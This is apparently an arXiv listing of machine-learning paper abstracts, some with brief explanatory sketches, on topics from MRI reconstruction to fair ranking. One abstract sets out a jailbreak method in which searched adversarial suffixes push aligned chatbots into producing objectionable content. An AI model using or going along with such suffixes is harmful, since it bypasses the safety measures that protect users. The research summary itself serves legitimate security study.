    Recent work has shown that Machine Learning (ML) programs are error-prone and called for contracts for ML code. Contracts, as in the design by contract methodology, help document APIs and aid API users in writing correct code. The question is: what kinds of contracts would provide the most help to API users? We are especially interested in what kinds of contracts help API users catch errors at earlier stages in the ML pipeline. We describe an empirical study of posts on Stack Overflow of the four most often-discussed ML libraries: TensorFlow, Scikit-learn, Keras, and PyTorch. For these libraries, our study extracted 413 informal (English) API specifications. We used these specifications to understand the following questions. What are the root causes and effects behind ML contract violations? Are there common patterns of ML contract violations? When does understanding ML contracts require an advanced level of ML software expertise? Could checking contracts at the API level help detect the violations in early ML pipeline stages? Our key findings are that the most commonly needed contracts for ML APIs are either checking constraints on single arguments of an API or on the order of API calls. The software engineering community could employ existing contract mining approaches to mine these contracts to promote an increased understanding of ML APIs. We also noted a need to combine behavioral and temporal contract mining approaches. We report on categories of required ML contracts, which may help designers of contract languages.
    Unsupervised reconstruction of accelerated cardiac cine MRI using Neural Fields. (arXiv:2307.14363v1 [eess.IV])
Cardiac cine MRI is the gold standard for cardiac functional assessment, but the inherently slow acquisition process creates the necessity of reconstruction approaches for accelerated undersampled acquisitions. Several regularization approaches that exploit spatial-temporal redundancy have been proposed to reconstruct undersampled cardiac cine MRI. More recently, methods based on supervised deep learning have also been proposed to further accelerate acquisition and reconstruction. However, these techniques usually rely on large datasets for training, which are not always available. In this work, we propose an unsupervised approach based on implicit neural field representations for cardiac cine MRI (so called NF-cMRI). The proposed method was evaluated in in-vivo undersampled golden-angle radial multi-coil acquisitions for undersampling factors of 26x and 52x, achieving good image quality, with comparable spatial depiction and improved temporal depiction relative to a state-of-the-art reconstruction technique.
    Optimal Estimation in Mixed-Membership Stochastic Block Models. (arXiv:2307.14530v1 [stat.ML])
    Community detection is one of the most critical problems in modern network science. Its applications can be found in various fields, from protein modeling to social network analysis. Recently, many papers appeared studying the problem of overlapping community detection, where each node of a network may belong to several communities. In this work, we consider Mixed-Membership Stochastic Block Model (MMSB) first proposed by Airoldi et al. (2008). MMSB provides quite a general setting for modeling overlapping community structure in graphs. The central question of this paper is to reconstruct relations between communities given an observed network. We compare different approaches and establish the minimax lower bound on the estimation error. Then, we propose a new estimator that matches this lower bound. Theoretical results are proved under fairly general conditions on the considered model. Finally, we illustrate the theory in a series of experiments.
    A Survey on Generative Modeling with Limited Data, Few Shots, and Zero Shot. (arXiv:2307.14397v1 [cs.CV])
    In machine learning, generative modeling aims to learn to generate new data statistically similar to the training data distribution. In this paper, we survey learning generative models under limited data, few shots and zero shot, referred to as Generative Modeling under Data Constraint (GM-DC). This is an important topic when data acquisition is challenging, e.g. healthcare applications. We discuss background, challenges, and propose two taxonomies: one on GM-DC tasks and another on GM-DC approaches. Importantly, we study interactions between different GM-DC tasks and approaches. Furthermore, we highlight research gaps, research trends, and potential avenues for future exploration. Project website: https://gmdc-survey.github.io.
    Neural Networks for Scalar Input and Functional Output. (arXiv:2208.05776v2 [stat.ML] UPDATED)
    The regression of a functional response on a set of scalar predictors can be a challenging task, especially if there is a large number of predictors, or the relationship between those predictors and the response is nonlinear. In this work, we propose a solution to this problem: a feed-forward neural network (NN) designed to predict a functional response using scalar inputs. First, we transform the functional response to a finite-dimensional representation and construct an NN that outputs this representation. Then, we propose to modify the output of an NN via the objective function and introduce different objective functions for network training. The proposed models are suited for both regularly and irregularly spaced data, and a roughness penalty can be further applied to control the smoothness of the predicted curve. The difficulty in implementing both those features lies in the definition of objective functions that can be back-propagated. In our experiments, we demonstrate that our model outperforms the conventional function-on-scalar regression model in multiple scenarios while computationally scaling better with the dimension of the predictors.
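The first step the abstract describes — transforming the functional response to a finite-dimensional representation — is commonly done by projecting each observed curve onto a small basis. This sketch uses a Fourier basis and least squares as one concrete choice (the paper also considers learning the representation through the objective function; the function name and basis are illustrative):

```python
import numpy as np

def fourier_coefs(t, y, n_pairs=2):
    """Least-squares projection of a curve y(t), t in [0, 1], onto a small
    Fourier basis. A network can then be trained to output these
    coefficients instead of the full curve."""
    cols = [np.ones_like(t)]
    for k in range(1, n_pairs + 1):
        cols.append(np.sin(2 * np.pi * k * t))
        cols.append(np.cos(2 * np.pi * k * t))
    B = np.column_stack(cols)                       # (n_points, 2*n_pairs + 1)
    coefs, *_ = np.linalg.lstsq(B, y, rcond=None)   # finite-dim representation
    return coefs, B

t = np.linspace(0.0, 1.0, 101)
y = np.sin(2 * np.pi * t)          # a curve exactly in the basis span
coefs, B = fourier_coefs(t, y)
```

Because the basis expansion is differentiable in the coefficients, the fit `B @ coefs` can sit inside a back-propagated objective, which is the property the abstract highlights.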
    From Contextual Data to Newsvendor Decisions: On the Actual Performance of Data-Driven Algorithms. (arXiv:2302.08424v3 [cs.LG] UPDATED)
In this work, we explore a framework for contextual decision-making to study how the relevance and quantity of past data affects the performance of a data-driven policy. We analyze a contextual Newsvendor problem in which a decision-maker needs to trade-off between an underage and an overage cost in the face of uncertain demand. We consider a setting in which past demands observed under ``close by'' contexts come from close by distributions and analyze the performance of data-driven algorithms through a notion of context-dependent worst-case expected regret. We analyze the broad class of Weighted Empirical Risk Minimization (WERM) policies which weigh past data according to their similarity in the contextual space. This class includes classical policies such as ERM, k-Nearest Neighbors and kernel-based policies. Our main methodological contribution is to characterize exactly the worst-case regret of any WERM policy on any given configuration of contexts. To the best of our knowledge, this provides the first understanding of tight performance guarantees in any contextual decision-making problem, with past literature focusing on upper bounds via concentration inequalities. We instead take an optimization approach, and isolate a structure in the Newsvendor loss function that allows us to reduce the infinite-dimensional optimization problem over worst-case distributions to a simple line search. This in turn allows us to unveil fundamental insights that were obfuscated by previous general-purpose bounds. We characterize actual guaranteed performance as a function of the contexts and obtain granular insights into the learning curve of algorithms.
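A WERM newsvendor policy is concrete enough to sketch: with underage cost $b$ and overage cost $h$, the ERM solution orders the $b/(b+h)$ quantile of past demand, and WERM replaces the empirical distribution with one weighted by context similarity. The Gaussian kernel and bandwidth below are illustrative choices (kernel-based policies are one member of the class the paper analyzes):

```python
import numpy as np

def werm_newsvendor(demands, contexts, x0, b=3.0, h=1.0, bandwidth=1.0):
    """Weighted ERM newsvendor order quantity for current context x0.

    Weights past observations by a Gaussian kernel on context distance,
    then returns the weighted b/(b+h) empirical quantile of demand.
    """
    w = np.exp(-np.linalg.norm(contexts - x0, axis=1) ** 2
               / (2.0 * bandwidth ** 2))
    w = w / w.sum()
    order = np.argsort(demands)
    cum = np.cumsum(w[order])
    tau = b / (b + h)                       # critical fractile (here 0.75)
    idx = min(np.searchsorted(cum, tau), len(demands) - 1)
    return demands[order][idx]

# sanity check: identical contexts reduce WERM to the plain empirical quantile
demands = np.arange(1.0, 101.0)
contexts = np.zeros((100, 2))
q = werm_newsvendor(demands, contexts, x0=np.zeros(2))
```

Uniform weights recover ERM; a shrinking bandwidth recovers nearest-neighbor-style policies, illustrating how the weighting scheme spans the class described in the abstract.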
    On the non-efficient PAC learnability of conjunctive queries. (arXiv:2208.10255v2 [cs.DB] UPDATED)
    This note serves three purposes: (i) we provide a self-contained exposition of the fact that conjunctive queries are not efficiently learnable in the Probably-Approximately-Correct (PAC) model, paying clear attention to the complicating fact that this concept class lacks the polynomial-size fitting property, a property that is tacitly assumed in much of the computational learning theory literature; (ii) we establish a strong negative PAC learnability result that applies to many restricted classes of conjunctive queries (CQs), including acyclic CQs for a wide range of notions of "acyclicity"; (iii) we show that CQs (and UCQs) are efficiently PAC learnable with membership queries.
    FLARE: Fingerprinting Deep Reinforcement Learning Agents using Universal Adversarial Masks. (arXiv:2307.14751v1 [cs.LG])
We propose FLARE, the first fingerprinting mechanism to verify whether a suspected Deep Reinforcement Learning (DRL) policy is an illegitimate copy of another (victim) policy. We first show that it is possible to find non-transferable, universal adversarial masks, i.e., perturbations, to generate adversarial examples that can successfully transfer from a victim policy to its modified versions but not to independently trained policies. FLARE employs these masks as fingerprints to verify the true ownership of stolen DRL policies by measuring an action agreement value over states perturbed via such masks. Our empirical evaluations show that FLARE is effective (100% action agreement on stolen copies) and does not falsely accuse independent policies (no false positives). FLARE is also robust to model modification attacks and cannot be easily evaded by more informed adversaries without negatively impacting agent performance. We also show that not all universal adversarial masks are suitable candidates for fingerprints due to the inherent characteristics of DRL policies. The spatio-temporal dynamics of DRL problems and the sequential decision-making process make it more difficult both to characterize the decision boundary of DRL policies and to search for universal masks that capture its geometry.
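The verification statistic itself — action agreement over mask-perturbed states — is simple to state in code. This is a minimal sketch under the assumption of deterministic policies with discrete actions; the function and argument names are illustrative, not FLARE's actual interface:

```python
import numpy as np

def action_agreement(victim, suspect, states, mask):
    """Fraction of mask-perturbed states on which two policies pick the
    same action. High agreement on the victim's fingerprint mask is
    evidence the suspect is a (possibly modified) copy."""
    perturbed = states + mask   # apply the universal adversarial mask
    return float(np.mean([victim(s) == suspect(s) for s in perturbed]))

# toy deterministic policies over a 4-dimensional state
victim = lambda s: int(s.sum() > 0)
independent = lambda s: 1 - int(s.sum() > 0)
states = np.array([[1.0, 1, 1, 1], [-1, -1, -1, -1], [2, 0, 0, 0]])
mask = np.full(4, 0.01)
same = action_agreement(victim, victim, states, mask)        # 1.0
diff = action_agreement(victim, independent, states, mask)   # 0.0
```

The paper's contribution lies in constructing masks for which this agreement is high on stolen copies yet low on independently trained policies.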
    EdgeConvEns: Convolutional Ensemble Learning for Edge Intelligence. (arXiv:2307.14381v1 [cs.LG])
    Deep edge intelligence aims to deploy deep learning models that demand computationally expensive training in the edge network with limited computational power. Moreover, many deep edge intelligence applications require handling distributed data that cannot be transferred to a central server due to privacy concerns. Decentralized learning methods, such as federated learning, offer solutions where models are learned collectively by exchanging learned weights. However, they often require complex models that edge devices may not handle and multiple rounds of network communication to achieve state-of-the-art performances. This study proposes a convolutional ensemble learning approach, coined EdgeConvEns, that facilitates training heterogeneous weak models on edge and learning to ensemble them where data on edge are heterogeneously distributed. Edge models are implemented and trained independently on Field-Programmable Gate Array (FPGA) devices with various computational capacities. Learned data representations are transferred to a central server where the ensemble model is trained with the learned features received from the edge devices to boost the overall prediction performance. Extensive experiments demonstrate that the EdgeConvEns can outperform the state-of-the-art performance with fewer communications and less data in various training scenarios.
    Explainable Disparity Compensation for Efficient Fair Ranking. (arXiv:2307.14366v1 [cs.LG])
    Ranking functions that are used in decision systems often produce disparate results for different populations because of bias in the underlying data. Addressing, and compensating for, these disparate outcomes is a critical problem for fair decision-making. Recent compensatory measures have mostly focused on opaque transformations of the ranking functions to satisfy fairness guarantees or on the use of quotas or set-asides to guarantee a minimum number of positive outcomes to members of underrepresented groups. In this paper we propose easily explainable data-driven compensatory measures for ranking functions. Our measures rely on the generation of bonus points given to members of underrepresented groups to address disparity in the ranking function. The bonus points can be set in advance, and can be combined, allowing for considering the intersections of representations and giving better transparency to stakeholders. We propose efficient sampling-based algorithms to calculate the number of bonus points to minimize disparity. We validate our algorithms using real-world school admissions and recidivism datasets, and compare our results with that of existing fair ranking algorithms.
    Towards Better Generalization with Flexible Representation of Multi-Module Graph Neural Networks. (arXiv:2209.06589v3 [cs.LG] UPDATED)
    Graph neural networks (GNNs) have become compelling models designed to perform learning and inference on graph-structured data. However, little work has been done to understand the fundamental limitations of GNNs for scaling to larger graphs and generalizing to out-of-distribution (OOD) inputs. In this paper, we use a random graph generator to systematically investigate how the graph size and structural properties affect the predictive performance of GNNs. We present specific evidence that the average node degree is a key feature in determining whether GNNs can generalize to unseen graphs, and that the use of multiple node update functions can improve the generalization performance of GNNs when dealing with graphs of multimodal degree distributions. Accordingly, we propose a multi-module GNN framework that allows the network to adapt flexibly to new graphs by generalizing a single canonical nonlinear transformation over aggregated inputs. Our results show that the multi-module GNNs improve the OOD generalization on a variety of inference tasks in the direction of diverse structural features.
    Universal and Transferable Adversarial Attacks on Aligned Language Models. (arXiv:2307.15043v1 [cs.CL])
    Because "out-of-the-box" large language models are capable of generating a great deal of objectionable content, recent work has focused on aligning these models in an attempt to prevent undesirable generation. While there has been some success at circumventing these measures -- so-called "jailbreaks" against LLMs -- these attacks have required significant human ingenuity and are brittle in practice. In this paper, we propose a simple and effective attack method that causes aligned language models to generate objectionable behaviors. Specifically, our approach finds a suffix that, when attached to a wide range of queries for an LLM to produce objectionable content, aims to maximize the probability that the model produces an affirmative response (rather than refusing to answer). However, instead of relying on manual engineering, our approach automatically produces these adversarial suffixes by a combination of greedy and gradient-based search techniques, and also improves over past automatic prompt generation methods. Surprisingly, we find that the adversarial prompts generated by our approach are quite transferable, including to black-box, publicly released LLMs. Specifically, we train an adversarial attack suffix on multiple prompts (i.e., queries asking for many different types of objectionable content), as well as multiple models (in our case, Vicuna-7B and 13B). When doing so, the resulting attack suffix is able to induce objectionable content in the public interfaces to ChatGPT, Bard, and Claude, as well as open source LLMs such as LLaMA-2-Chat, Pythia, Falcon, and others. In total, this work significantly advances the state-of-the-art in adversarial attacks against aligned language models, raising important questions about how such systems can be prevented from producing objectionable information. Code is available at github.com/llm-attacks/llm-attacks.
    Semantic Image Completion and Enhancement using GANs. (arXiv:2307.14748v1 [cs.CV])
Semantic inpainting or image completion refers to the task of inferring arbitrary large missing regions in images based on image semantics. Since the prediction of image pixels requires an indication of high-level context, this makes it significantly tougher than classical inpainting, which is often more concerned with correcting data corruption and removing entire objects from the input image. On the other hand, image enhancement attempts to eliminate unwanted noise and blur from the image, along with sustaining most of the image details. An efficient image completion and enhancement model should be able to recover the corrupted and masked regions in images and then refine the image further to increase the quality of the output image. Generative Adversarial Networks (GAN) have turned out to be helpful in picture completion tasks. In this chapter, we will discuss the underlying GAN architecture and how they can be used for image completion tasks.
    Adversarial Sleeping Bandit Problems with Multiple Plays: Algorithm and Ranking Application. (arXiv:2307.14549v1 [cs.LG])
This paper presents an efficient algorithm to solve the sleeping bandit with multiple plays problem in the context of an online recommendation system. The problem involves bounded, adversarial loss and unknown i.i.d. distributions for arm availability. The proposed algorithm extends the sleeping bandit algorithm for single arm selection and is guaranteed to achieve theoretical performance with regret upper bounded by $\mathcal{O}(kN^2\sqrt{T\log T})$, where $k$ is the number of arms selected per time step, $N$ is the total number of arms, and $T$ is the time horizon.
    Likely, Light, and Accurate Context-Free Clusters-based Trajectory Prediction. (arXiv:2307.14788v1 [cs.LG])
Autonomous systems in the road transportation network require intelligent mechanisms that cope with uncertainty to foresee the future. In this paper, we propose a multi-stage probabilistic approach for trajectory forecasting: trajectory transformation to displacement space, clustering of displacement time series, trajectory proposals, and ranking proposals. We introduce a new deep feature clustering method, underlying self-conditioned GAN, which copes better with distribution shifts than traditional methods. Additionally, we propose novel distance-based ranking proposals to assign probabilities to the generated trajectories that are more efficient yet accurate than an auxiliary neural network. The overall system surpasses context-free deep generative models on human and road-agent trajectory data while performing similarly to point estimators when comparing the most probable trajectory.
    Incrementally-Computable Neural Networks: Efficient Inference for Dynamic Inputs. (arXiv:2307.14988v1 [cs.LG])
Deep learning often faces the challenge of efficiently processing dynamic inputs, such as sensor data or user inputs. For example, an AI writing assistant is required to update its suggestions in real time as a document is edited. Re-running the model each time is expensive, even with compression techniques like knowledge distillation, pruning, or quantization. Instead, we take an incremental computing approach, looking to reuse calculations as the inputs change. However, the dense connectivity of conventional architectures poses a major obstacle to incremental computation, as even minor input changes cascade through the network and restrict information reuse. To address this, we use vector quantization to discretize intermediate values in the network, which filters out noisy and unnecessary modifications to hidden neurons, facilitating the reuse of their values. We apply this approach to the transformer architecture, creating an efficient incremental inference algorithm with complexity proportional to the fraction of the modified inputs. Our experiments with adapting the OPT-125M pre-trained language model demonstrate comparable accuracy on document classification while requiring 12.1X (median) fewer operations for processing sequences of atomic edits.
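Why vector quantization enables reuse can be shown in a few lines: snapping hidden vectors to their nearest codebook entry makes small input edits produce bit-identical discrete states, so cached downstream results remain valid. This is a toy sketch of the discretization step only (codebook and shapes are illustrative; the paper's full algorithm also handles cache invalidation through the transformer layers):

```python
import numpy as np

def quantize(h, codebook):
    """Map each hidden vector in h (n, d) to its nearest codebook entry.
    Returns the discrete code indices and the quantized vectors."""
    d2 = ((h[:, None, :] - codebook[None, :, :]) ** 2).sum(axis=-1)
    idx = d2.argmin(axis=1)
    return idx, codebook[idx]

codebook = np.array([[0.0, 0.0], [1.0, 1.0]])
h1 = np.array([[0.1, 0.0], [0.9, 1.1]])
h2 = h1 + 0.02                      # a small "edit" to the input
i1, _ = quantize(h1, codebook)
i2, _ = quantize(h2, codebook)
print(np.array_equal(i1, i2))       # codes unchanged -> downstream reuse
```

Whenever the code indices match the cached ones, the layers consuming those hidden states need not be recomputed, which is the source of the operation savings reported in the abstract.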
    Kernelised Normalising Flows. (arXiv:2307.14839v1 [stat.ML])
    Normalising Flows are generative models characterised by their invertible architecture. However, the requirement of invertibility imposes constraints on their expressiveness, necessitating a large number of parameters and innovative architectural designs to achieve satisfactory outcomes. Whilst flow-based models predominantly rely on neural-network-based transformations for expressive designs, alternative transformation methods have received limited attention. In this work, we present Ferumal flow, a novel kernelised normalising flow paradigm that integrates kernels into the framework. Our results demonstrate that a kernelised flow can yield competitive or superior results compared to neural network-based flows whilst maintaining parameter efficiency. Kernelised flows excel especially in the low-data regime, enabling flexible non-parametric density estimation in applications with sparse data availability.
    Solving Data Quality Problems with Desbordante: a Demo. (arXiv:2307.14935v1 [cs.DB])
    Data profiling is an essential process in modern data-driven industries. One of its critical components is the discovery and validation of complex statistics, including functional dependencies, data constraints, association rules, and others. However, most existing data profiling systems that focus on complex statistics do not provide proper integration with the tools used by contemporary data scientists. This creates a significant barrier to the adoption of these tools in the industry. Moreover, existing systems were not created with industrial-grade workloads in mind. Finally, they do not aim to provide descriptive explanations, i.e. why a given pattern is not found. This is a significant issue, as it is essential to understand the underlying reasons for a specific pattern's absence in order to make informed decisions based on the data. As a result, these patterns are effectively left hanging in mid-air: their application scope is rather limited, and they are rarely used by the broader public. At the same time, as we are going to demonstrate in this presentation, complex statistics can be efficiently used to solve many classic data quality problems. Desbordante is an open-source data profiler that aims to close this gap. It is built with an emphasis on industrial application: it is efficient, scalable, resilient to crashes, and provides explanations. Furthermore, it provides seamless Python integration by offloading various costly operations, not only mining, to the C++ core. In this demonstration, we show several scenarios that allow end users to solve different data quality problems. Namely, we showcase typo detection, data deduplication, and data anomaly detection scenarios.
    Network Fault-tolerant and Byzantine-resilient Social Learning via Collaborative Hierarchical Non-Bayesian Learning. (arXiv:2307.14952v1 [cs.LG])
    As the network scale increases, existing fully distributed solutions start to lag behind the real-world challenges such as (1) slow information propagation, (2) network communication failures, and (3) external adversarial attacks. In this paper, we focus on hierarchical system architecture and address the problem of non-Bayesian learning over networks that are vulnerable to communication failures and adversarial attacks. On network communication, we consider packet-dropping link failures. We first propose a hierarchical robust push-sum algorithm that can achieve average consensus despite frequent packet-dropping link failures. We provide a sparse information fusion rule between the parameter server and arbitrarily selected network representatives. Then, interleaving the consensus update step with a dual averaging update with Kullback-Leibler (KL) divergence as the proximal function, we obtain a packet-dropping fault-tolerant non-Bayesian learning algorithm with provable convergence guarantees. On external adversarial attacks, we consider Byzantine attacks in which the compromised agents can send maliciously calibrated messages to others (including both the agents and the parameter server). To avoid the curse of dimensionality of Byzantine consensus, we solve the non-Bayesian learning problem via running multiple dynamics, each of which only involves Byzantine consensus with scalar inputs. To facilitate resilient information propagation across sub-networks, we use a novel Byzantine-resilient gossiping-type rule at the parameter server.
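    The average-consensus building block can be illustrated with a toy push-sum sketch; the rule of retaining mass on a dropped link is a common robustness fix and only loosely mirrors the paper's hierarchical algorithm:

```python
import random

def push_sum(values, steps=200, drop_prob=0.2, seed=0):
    """Push-sum average consensus: each node keeps half of its (sum, weight)
    mass and pushes the other half to a random node. On a dropped packet the
    sender retains its share, so total mass is conserved despite link failures
    (a simplification of the paper's robust hierarchical variant)."""
    rng = random.Random(seed)
    n = len(values)
    s = list(values)     # running sums
    w = [1.0] * n        # running weights
    for _ in range(steps):
        new_s, new_w = [0.0] * n, [0.0] * n
        for i in range(n):
            half_s, half_w = s[i] / 2, w[i] / 2
            new_s[i] += half_s
            new_w[i] += half_w
            j = rng.randrange(n)
            if rng.random() < drop_prob:
                new_s[i] += half_s   # link failed: keep the mass
                new_w[i] += half_w
            else:
                new_s[j] += half_s
                new_w[j] += half_w
        s, w = new_s, new_w
    return [si / wi for si, wi in zip(s, w)]

est = push_sum([1.0, 3.0, 5.0, 7.0])
print(est)   # all ratios converge near the true average 4.0
```

Because mass is never lost, the ratio s/w at every node converges to the network-wide average even under frequent packet drops.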
    Role of Image Acquisition and Patient Phenotype Variations in Automatic Segmentation Model Generalization. (arXiv:2307.14482v1 [eess.IV])
    Purpose: This study evaluated the out-of-domain performance and generalization capabilities of automated medical image segmentation models, with a particular focus on adaptation to new image acquisitions and disease type. Materials: Datasets from both non-contrast and contrast-enhanced abdominal CT scans of healthy patients and those with polycystic kidney disease (PKD) were used. A total of 400 images (100 non-contrast controls, 100 contrast controls, 100 non-contrast PKD, 100 contrast PKD) were utilized for training/validation of models to segment kidneys, livers, and spleens, and the final models were then tested on 100 non-contrast CT images of patients affected by PKD. Performance was evaluated using Dice, Jaccard, TPR, and Precision. Results: Models trained on a diverse range of data showed no worse performance than models trained exclusively on in-domain data when tested on in-domain data. For instance, the Dice similarity of the model trained on 25% from each dataset was found to be non-inferior to the model trained purely on in-domain data. Conclusions: The results indicate that a broader range of training examples significantly enhances model generalization and out-of-domain performance, thereby improving automated segmentation tools' applicability in clinical settings. The study's findings provide a roadmap for future research to adopt a data-centric approach in medical image AI model development.
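    The reported metrics are standard overlap scores; a tiny reference implementation for binary masks (flattened to 0/1 lists for clarity):

```python
def dice(pred, truth):
    """Dice similarity between two binary masks (flat 0/1 sequences)."""
    inter = sum(p * t for p, t in zip(pred, truth))
    total = sum(pred) + sum(truth)
    return 2 * inter / total if total else 1.0

def jaccard(pred, truth):
    """Jaccard index (intersection over union) for binary masks."""
    inter = sum(p * t for p, t in zip(pred, truth))
    union = sum(1 for p, t in zip(pred, truth) if p or t)
    return inter / union if union else 1.0

pred  = [1, 1, 0, 0, 1]
truth = [1, 0, 0, 1, 1]
print(dice(pred, truth), jaccard(pred, truth))   # 2*2/6 ≈ 0.667, 2/4 = 0.5
```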
    Evaluation of Safety Constraints in Autonomous Navigation with Deep Reinforcement Learning. (arXiv:2307.14568v1 [cs.RO])
    While reinforcement learning algorithms have had great success in the field of autonomous navigation, they cannot be straightforwardly applied to real autonomous systems without considering safety constraints. The latter are crucial to avoid unsafe behaviors of the autonomous vehicle on the road. To highlight the importance of these constraints, in this study, we compare two learnable navigation policies: safe and unsafe. The safe policy takes the constraints into account, while the other does not. We show that the safe policy is able to generate trajectories with more clearance (distance to the obstacles) and makes fewer collisions during training, without sacrificing overall performance.
    A Hybrid Machine Learning Model for Classifying Gene Mutations in Cancer using LSTM, BiLSTM, CNN, GRU, and GloVe. (arXiv:2307.14361v1 [q-bio.QM])
    This study presents an ensemble model combining LSTM, BiLSTM, CNN, GRU, and GloVe to classify gene mutations using Kaggle's Personalized Medicine: Redefining Cancer Treatment dataset. The results were compared against well-known transformers such as BERT, Electra, Roberta, XLNet, Distilbert, and their LSTM ensembles. Our model outperformed all other models in terms of accuracy, precision, recall, F1 score, and Mean Squared Error. Surprisingly, it also needed less training time, resulting in a perfect combination of performance and efficiency. This study demonstrates the utility of ensemble models for difficult tasks such as gene mutation classification.
    Imitating Complex Trajectories: Bridging Low-Level Stability and High-Level Behavior. (arXiv:2307.14619v1 [cs.LG])
    We propose a theoretical framework for studying the imitation of stochastic, non-Markovian, potentially multi-modal (i.e. "complex" ) expert demonstrations in nonlinear dynamical systems. Our framework invokes low-level controllers - either learned or implicit in position-command control - to stabilize imitation policies around expert demonstrations. We show that with (a) a suitable low-level stability guarantee and (b) a stochastic continuity property of the learned policy we call "total variation continuity" (TVC), an imitator that accurately estimates actions on the demonstrator's state distribution closely matches the demonstrator's distribution over entire trajectories. We then show that TVC can be ensured with minimal degradation of accuracy by combining a popular data-augmentation regimen with a novel algorithmic trick: adding augmentation noise at execution time. We instantiate our guarantees for policies parameterized by diffusion models and prove that if the learner accurately estimates the score of the (noise-augmented) expert policy, then the distribution of imitator trajectories is close to the demonstrator distribution in a natural optimal transport distance. Our analysis constructs intricate couplings between noise-augmented trajectories, a technique that may be of independent interest. We conclude by empirically validating our algorithmic recommendations.
    Unsupervised Deep Learning-based Pansharpening with Jointly-Enhanced Spectral and Spatial Fidelity. (arXiv:2307.14403v1 [eess.IV])
    In recent years, deep learning has gained a leading role in the pansharpening of multiresolution images. Given the lack of ground truth data, most deep learning-based methods carry out supervised training in a reduced-resolution domain. However, models trained on downsized images tend to perform poorly on high-resolution target images. For this reason, several research groups are now turning to unsupervised training in the full-resolution domain, through the definition of appropriate loss functions and training paradigms. In this context, we have recently proposed a full-resolution training framework which can be applied to many existing architectures. Here, we propose a new deep learning-based pansharpening model that fully exploits the potential of this approach and provides cutting-edge performance. Besides architectural improvements with respect to previous work, such as the use of residual attention modules, the proposed model features a novel loss function that jointly promotes the spectral and spatial quality of the pansharpened data. In addition, thanks to a new fine-tuning strategy, it improves inference-time adaptation to target images. Experiments on a large variety of test images, performed in challenging scenarios, demonstrate that the proposed method compares favorably with the state of the art both in terms of numerical results and visual output. Code is available online at https://github.com/matciotola/Lambda-PNN.
    Empirical analysis of Different Dimensionality Reduction and classification Techniques for Epileptic Seizure detection. (arXiv:2302.12012v2 [cs.LG] UPDATED)
    An Electroencephalogram (EEG) is a non-invasive exam that records the electrical activity of the brain and is used to help diagnose various brain conditions. EEG signals are analysed for epilepsy detection using the Discrete Wavelet Transform (DWT) and machine learning classifiers. In epileptic seizure detection, machine learning classifiers and statistical features are mainly used. The hidden information in the EEG signal is useful for detecting diseases affecting the brain, but it can be very difficult to identify subtle changes in the EEG in the time and frequency domains. The DWT provides a good decomposition of the signals into different frequency bands for feature extraction. We use three dimensionality reduction algorithms: Principal Component Analysis (PCA), Independent Component Analysis (ICA), and Linear Discriminant Analysis (LDA). Features are then selected using a fusion rule, and in the final step three different classifiers, Support Vector Machine (SVM), Naive Bayes (NB), and K-Nearest-Neighbor (KNN), are applied individually for classification. The proposed framework is tested on the Bonn dataset, and the simulation results yield accuracies of 89.17% for LDA with SVM, 80.42% for LDA with KNN, 89.92% for PCA with NB, 85.58% for PCA with SVM, 80.42% for PCA with KNN, 82.33% for ICA with NB, 90.42% for ICA with SVM, 90% for ICA with KNN, and 100% for LDA with NB. The LDA-with-NB combination achieves sensitivity, specificity, accuracy, precision, and recall of 100% each, outperforming all existing methods. The results prove the effectiveness of this model.
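    The DWT front end can be sketched with a plain Haar transform; the per-band energy features below are illustrative stand-ins for the paper's statistical features, not its exact pipeline:

```python
import math, random

def haar_dwt(signal):
    """One level of the Haar DWT: approximation and detail coefficients."""
    approx = [(signal[i] + signal[i + 1]) / math.sqrt(2)
              for i in range(0, len(signal) - 1, 2)]
    detail = [(signal[i] - signal[i + 1]) / math.sqrt(2)
              for i in range(0, len(signal) - 1, 2)]
    return approx, detail

def band_features(signal, levels=3):
    """Decompose into frequency bands; summarise each band by its mean energy.
    These features would then be fed to PCA/ICA/LDA and a classifier."""
    feats, current = [], list(signal)
    for _ in range(levels):
        current, detail = haar_dwt(current)
        feats.append(sum(d * d for d in detail) / len(detail))
    feats.append(sum(c * c for c in current) / len(current))
    return feats

rng = random.Random(0)
eeg = [math.sin(0.3 * t) + 0.1 * rng.gauss(0, 1) for t in range(256)]
print(band_features(eeg))   # one energy per detail band + final approximation
```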
    When Multi-Task Learning Meets Partial Supervision: A Computer Vision Review. (arXiv:2307.14382v1 [cs.LG])
    Multi-Task Learning (MTL) aims to learn multiple tasks simultaneously while exploiting their mutual relationships. By using shared resources to simultaneously calculate multiple outputs, this learning paradigm has the potential to have lower memory requirements and inference times compared to the traditional approach of using separate methods for each task. Previous work in MTL has mainly focused on fully-supervised methods, as task relationships can not only be leveraged to lower the level of data-dependency of those methods but they can also improve performance. However, MTL introduces a set of challenges due to a complex optimisation scheme and a higher labeling requirement. This review focuses on how MTL could be utilised under different partial supervision settings to address these challenges. First, this review analyses how MTL traditionally uses different parameter sharing techniques to transfer knowledge in between tasks. Second, it presents the different challenges arising from such a multi-objective optimisation scheme. Third, it introduces how task groupings can be achieved by analysing task relationships. Fourth, it focuses on how partially supervised methods applied to MTL can tackle the aforementioned challenges. Lastly, this review presents the available datasets, tools and benchmarking results of such methods.
    Machine Learning with a Reject Option: A survey. (arXiv:2107.11277v2 [cs.LG] UPDATED)
    Machine learning models always make a prediction, even when it is likely to be inaccurate. This behavior should be avoided in many decision support applications, where mistakes can have severe consequences. Although already studied as early as 1970, machine learning with rejection has recently regained interest. This machine learning subfield enables machine learning models to abstain from making a prediction when they are likely to make a mistake. This survey aims to provide an overview of machine learning with rejection. We introduce the conditions leading to two types of rejection, ambiguity and novelty rejection, which we carefully formalize. Moreover, we review and categorize strategies to evaluate a model's predictive and rejective quality. Additionally, we define the existing architectures for models with rejection and describe the standard techniques for learning such models. Finally, we provide examples of relevant application domains and show how machine learning with rejection relates to other machine learning research areas.
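    Ambiguity rejection in its simplest form is a confidence threshold on the predicted class probabilities; a minimal sketch (the threshold value is arbitrary):

```python
def predict_with_reject(probs, threshold=0.75):
    """Ambiguity rejection: abstain when the top class probability is low.
    `probs` is a list of per-class probabilities for one example."""
    best = max(range(len(probs)), key=lambda k: probs[k])
    return best if probs[best] >= threshold else None   # None = abstain

print(predict_with_reject([0.9, 0.05, 0.05]))  # 0 (confident)
print(predict_with_reject([0.5, 0.45, 0.05]))  # None (ambiguous, reject)
```

Novelty rejection, by contrast, would additionally check whether the input looks like the training distribution at all, e.g. with an outlier score, before trusting any class probability.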
    Fixed Integral Neural Networks. (arXiv:2307.14439v1 [cs.LG])
